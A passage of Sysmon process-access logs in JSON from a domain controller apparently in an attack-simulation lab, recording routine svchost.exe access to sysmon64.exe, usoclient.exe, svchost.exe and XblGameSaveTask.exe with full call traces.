C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.928\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010497A0900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.928","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010497A0900}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001000800900}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001000800900}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
